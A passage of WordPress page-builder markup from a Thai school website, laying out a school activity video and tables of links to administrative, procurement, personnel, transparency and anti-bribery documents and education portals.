{\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 